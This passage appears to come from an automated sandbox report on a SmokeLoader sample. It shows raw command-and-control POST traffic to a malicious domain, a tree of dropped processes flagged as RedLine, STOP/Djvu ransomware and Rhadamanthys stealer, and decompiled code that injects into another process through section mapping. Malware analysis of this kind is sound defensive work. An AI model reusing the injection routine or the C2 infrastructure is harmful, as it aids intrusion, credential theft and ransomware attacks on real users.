3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Jan 25, 2023 09:28:24.653687000 CET	3285	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mlleyedksk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 341 Host: potunulit.org
Jan 25, 2023 09:28:24.653789043 CET	3286	OUT	Data Raw: 48 9d fb be 4f 13 23 20 2a 02 52 2e 0d db 25 be 5d 1d ec 67 fa 6d ad a8 c0 6a ab 87 00 ff df e7 8c ad 81 c7 01 43 95 cb a7 5b 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bf 8a 14 62 cd d6 4f 96 82 ce 2f de Data Ascii: HO# R.%]gmjC[jp_S61oJf=B!bO/04W+PHc[kv/cdnh%igtpTF2\oR]Q[bZ?bR{ve7BOBCH'7;"pu?:h
Jan 25, 2023 09:28:24.739021063 CET	3287	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6PedILqYb%2BwMtD2wBJm4ZxSuts3E7I0IwDbY5uPogmztKqFme4lJUWm3V74LUK2NlCZg5kCtcGIso%2B9MH%2FLhwKrANT9xqhHSvRoMjv5D1b3CuqLAkDNGMDntXlxckE78"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa29e1f8d9b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Jan 25, 2023 09:28:24.896620989 CET	3287	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vjawtynvst.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: potunulit.org
Jan 25, 2023 09:28:24.978197098 CET	3289	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:24 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jXA5e%2BFvXglUebSfydu1jGbAZaIN%2BEwesa3yQEBLrRnFGEadxsba8zsO1UquRqdjFm%2FQj3ypTAY%2FFfs9%2BEd83%2FHbDO%2Fnv0rXAEZ45COzU0JhoH7B5cl2z2GopIkweeQ%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa29faa3f9b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
Jan 25, 2023 09:28:25.086702108 CET	3289	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fyeyf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 198 Host: potunulit.org
Jan 25, 2023 09:28:25.163672924 CET	3291	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Jan 2023 08:28:25 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9mT70NdXjnFVYbDGiWKoYAvHVqm3cQYT48fLG6X8Ock5ML5BUUeBtUhxIcO4HdX%2BdqDpJuQgc9VRZqSxm7hLShTLeGbUo1oEgiEOx5R4pwhSR4k3uAQ%2BnwuuV86kkV3r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 78efa2a0dc119b2d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49737	162.0.217.254	443	C:\Users\user\AppData\Local\Temp\43D0.exe

Timestamp	Direction	Data
2023-01-25 08:28:28 UTC	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2023-01-25 08:28:28 UTC	IN	HTTP/1.1 429 Too Many Requests Date: Wed, 25 Jan 2023 08:28:28 GMT Server: Apache Strict-Transport-Security: max-age=63072000; preload X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block; report=... Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-01-25 08:28:28 UTC	IN	Data Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0 Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 1032, Parent PID: 3528

General

Target ID:	0
Start time:	09:27:06
Start date:	25/01/2023
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	344064 bytes
MD5 hash:	6DEF34B7D9603C4FC7953F177F73C21A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.397101149.00000000007A9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.397013971.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3528, Parent PID: 1032

General

Target ID:	3
Start time:	09:27:39
Start date:	25/01/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff618f60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: C676.exePID: 4620, Parent PID: 3528

General

Target ID:	6
Start time:	09:28:11
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\C676.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C676.exe
Imagebase:	0x400000
File size:	417792 bytes
MD5 hash:	261B1DB94CCF4266128E2EB71A80FDA4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.574270691.00000000006A8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.573778926.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 81%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: beiruttPID: 2236, Parent PID: 1088

General

Target ID:	7
Start time:	09:28:11
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\beirutt
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\beirutt
Imagebase:	0x400000
File size:	344064 bytes
MD5 hash:	6DEF34B7D9603C4FC7953F177F73C21A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 43D0.exePID: 1332, Parent PID: 3528

General

Target ID:	8
Start time:	09:28:19
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\43D0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\43D0.exe
Imagebase:	0x400000
File size:	718848 bytes
MD5 hash:	0A006808F7AA017CAF2DF9CE9E2B55A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.478433039.00000000048E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: C4AA.exePID: 4116, Parent PID: 3528

General

Target ID:	9
Start time:	09:28:22
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\C4AA.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\C4AA.exe
Imagebase:	0x860000
File size:	1642648 bytes
MD5 hash:	EA25CE2F3580AF1DD771BAC5B0D2BF83
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 43%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: 43D0.exePID: 3900, Parent PID: 1332

General

Target ID:	10
Start time:	09:28:25
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Local\Temp\43D0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\43D0.exe
Imagebase:	0x400000
File size:	718848 bytes
MD5 hash:	0A006808F7AA017CAF2DF9CE9E2B55A2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ngentask.exePID: 400, Parent PID: 4116

General

Target ID:	11
Start time:	09:28:31
Start date:	25/01/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Imagebase:	0x360000
File size:	85096 bytes
MD5 hash:	ED7F195F7121781CC3D380942765B57D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ngentask.exePID: 4292, Parent PID: 4116

General

Target ID:	12
Start time:	09:28:32
Start date:	25/01/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Imagebase:	0xfa0000
File size:	85096 bytes
MD5 hash:	ED7F195F7121781CC3D380942765B57D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: fontview.exePID: 4772, Parent PID: 4116

General

Target ID:	13
Start time:	09:28:34
Start date:	25/01/2023
Path:	C:\Windows\SysWOW64\fontview.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SYSWOW64\fontview.exe
Imagebase:	0xdb0000
File size:	114176 bytes
MD5 hash:	218D53564FB0DD0CAFBBF871641E70F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 1032, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	95.6%
Signature Coverage:	38.5%
Total number of Nodes:	91
Total number of Limit Nodes:	3

Executed Functions

Function 00401558 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00401558(intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				struct _EXCEPTION_RECORD _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				intOrPtr _v56;
				long _v60;
				char _v64;
				void* _v68;
				char _v72;
				void* _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __edi;
				intOrPtr _t87;
				struct _EXCEPTION_RECORD _t90;
				intOrPtr _t91;
				struct _GUID _t97;
				struct _GUID _t99;
				long _t100;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t183;
				intOrPtr* _t184;
				HANDLE* _t185;
				HANDLE* _t186;
				intOrPtr _t199;
				void* _t200;
				intOrPtr* _t201;
				void* _t205;

				_push(0x387);
				_t201 = _t200 + 4;
				_push(0x83);
				L004011F5(_t175, _t205);
				_t127 = _a4;
				_t176 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t183 =  &_v100;
				 *_t183 = _t176;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 =  &_v52;
					 *_t132 = _t90;
					 *(_t132 + 4) = _t176;
					_t184 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
					 *_t184 = 0x18;
					_push( &_v52);
					_push(_t184);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t176, _t176, 2) == 0) {
						_v12 = _t176;
						_t97 =  &_v84;
						 *(_t97 + 4) = _t176;
						 *_t97 = 0x5000;
						_t185 =  &_v88;
						if(NtCreateSection(_t185, 6, _t176, _t97, 4, 0x8000000, _t176) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t185, _v16, _t123, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
									_t199 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t199, 0x104);
									 *((intOrPtr*)(_t199 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t99 =  &_v84;
						 *(_t99 + 4) = _t176;
						 *_t99 = _a12 + 0x10000;
						_t186 =  &_v92;
						_t100 = NtCreateSection(_t186, 0xe, _t176, _t99, 0x40, 0x8000000, _t176);
						if (_t100 != 0) goto L67;
						 *_t100 =  *_t100 + _t100;
					}
				}
				_push(0x15a4);
				_t91 =  *_t201;
				_push(0x83);
				L004011F5(_t176, _t226);
				return _t91;
			}

0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164b
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

